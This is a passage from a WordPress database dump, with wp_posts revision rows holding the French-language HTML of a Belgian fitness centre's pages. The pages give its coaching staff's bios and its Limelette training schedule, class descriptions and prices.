5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"198\" height=\"259\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-06 21:06:21', '2013-11-06 21:06:21', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(393, 1, '2013-11-06 21:16:13', '2013-11-06 21:16:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-06 21:16:13', '2013-11-06 21:16:13', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(395, 1, '2013-11-14 21:20:57', '2013-11-14 21:20:57', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\nCardio: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\nCircuit training: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\nRenforcement musculaire: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:20:57', '2013-11-14 21:20:57', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(396, 1, '2013-11-14 21:23:43', '2013-11-14 21:23:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:23:43', '2013-11-14 21:23:43', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(397, 1, '2013-11-14 21:27:07', '2013-11-14 21:27:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:27:07', '2013-11-14 21:27:07', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
